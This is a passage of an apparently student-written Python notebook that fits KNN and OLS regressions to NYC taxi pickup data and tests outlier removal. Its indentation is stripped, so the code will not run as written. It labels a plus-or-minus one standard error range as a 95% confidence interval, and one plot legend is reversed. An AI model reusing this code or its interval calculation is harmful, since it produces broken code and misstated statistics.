data = {'train': train_data, 'test': test_data}[t]
predictions[t][k] = KNNmodels[k].predict(single_pred(data['TimeMin']))
plt.scatter(data['TimeMin'].values, data['PickupCount'].values)
plt.scatter(data['TimeMin'].values, predictions[t][k])
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title("Actual and predicted pickups for k=%d (%s)" % (k, t))
plt.legend(['actual', 'predicted'])
plt.subplots_adjust(top=3, wspace=0.4, hspace=0.4)
plt.suptitle("NYC Taxi pickup predictions for different k values", fontsize=18, x=.5, y=3.05)
plt.show()
r2 = pd.DataFrame(columns=['k', 'Type', 'R-squared'])
for k in k_vals:
for t in ['train', 'test']:
data = {'train': train_data, 'test': test_data}[t]
r2 = r2.append({'k': k,
'Type': t,
'R-squared': r2_score(data['PickupCount'].values, predictions[t][k])},
ignore_index=True)
display(r2)
tr, tst = r2.loc[r2['Type'] == 'train'], r2.loc[r2['Type'] == 'test']
plt.plot(tr['k'].values, tr['R-squared'].values)
plt.plot(tst['k'].values, tst['R-squared'].values)
plt.legend(['Training Accuracy', 'Test Accuracy'])
plt.xlabel("Nearest neighbor count (k)")
plt.ylabel('R-squared value')
plt.title('R-squared versus k-value')
train_data_X = sm.add_constant(train_data['TimeMin'])
model = OLS(train_data['PickupCount'], train_data_X)
results = model.fit()
i = 1
plt.figure(figsize=(10, 2))
plt.subplots_adjust(top=2, wspace=0.4, hspace=0.4)
plt.suptitle("NYC Taxi pickup predictions OLS train and test", fontsize=18, x=.5, y=2.3)
OLS_predictions = dict()
for t in ['train', 'test']:
plt.subplot(1, 2, i)
i += 1
data = {'train': train_data, 'test': test_data}[t]
data_X = sm.add_constant(data['TimeMin'])
OLS_predictions[t] = results.predict(data_X)
plt.scatter(data['TimeMin'].values, data['PickupCount'].values)
plt.plot(data['TimeMin'].values, OLS_predictions[t], color='orange')
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title("Actual and predicted pickups with OLS (%s)" % t)
plt.legend(['predicted', 'actual'])
for t in ['train', 'test']:
data = {'train': train_data, 'test': test_data}[t]
print("R-squared for %s is %f" % (t, r2_score(data['PickupCount'].values, OLS_predictions[t])))
print(results.summary())
print("Slope is %.3f" % results.params['TimeMin'])
print("Intercept is %.2f" % results.params['const'])
c_se, t_se = results.bse['const'], results.bse['TimeMin']
slope, intercept = results.params['TimeMin'], results.params['const']
print("95%% confidence interval for slope is [%.4f, %.4f]" % (slope - t_se, slope + t_se))
print("95%% confidence interval for intercept is [%.2f, %.2f]" % (intercept - c_se, intercept + c_se))
out_train = pd.read_csv('data/outliers_train.csv')
out_test = pd.read_csv('data/outliers_test.csv')
fig, ax = plt.subplots(2,1)
ax[0].scatter(out_train['X'],out_train['Y'])
ax[0].set_title("Training data")
ax[1].scatter(out_test['X'],out_test['Y'])
ax[1].set_title("Test data")
plt.show()
OutlierOLSModel = OLS(out_train['Y'], out_train['X'])
outlier_model_results = OutlierOLSModel.fit()
def find_outliers_simple(dataset_x, dataset_y, num_outliers):
residuals = np.abs(dataset_y - outlier_model_results.predict(out_train['X']))
table = pd.DataFrame({'ranks':np.argsort(residuals)})
outlier_indices = list(table.index[table['ranks'] > (len(table) - num_outliers - 1)])
return list(outlier_indices)
outliers = find_outliers_simple(out_train['X'], out_train['Y'], 3)
out_train_no_outliers = out_train.drop(outliers)
OutlierFreeSimpleModel = OLS(out_train_no_outliers['Y'], out_train_no_outliers['X'])
outlier_free_model_results = OutlierFreeSimpleModel.fit()
fig, ax = plt.subplots(1,2)
ax[0].scatter(out_train['X'], out_train['Y'])
ax[0].scatter(out_train_no_outliers['X'], out_train_no_outliers['Y'], color='orange')
ax[0].plot(out_train['X'], outlier_model_results.predict(out_train['X']))
ax[0].plot(out_train_no_outliers['X'], outlier_free_model_results.predict(out_train_no_outliers['X']))
ax[0].set_title("Training set")
ax[1].scatter(out_test['X'], out_test['Y'])
ax[1].plot(out_train['X'], outlier_model_results.predict(out_train['X']))
ax[1].plot(out_train_no_outliers['X'], outlier_free_model_results.predict(out_train_no_outliers['X']))
ax[1].set_title("Test set")
plt.show()
print("R-squared for OutlierOLSModel is %f" % (r2_score(out_test['Y'].values, outlier_model_results.predict(out_test['X']))))
print("R-squared for OutlierFreeSimpleModel is %f" % (r2_score(out_test['Y'].values, outlier_free_model_results.predict(out_test['X']))))
| 0.375592 | 0.975809 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.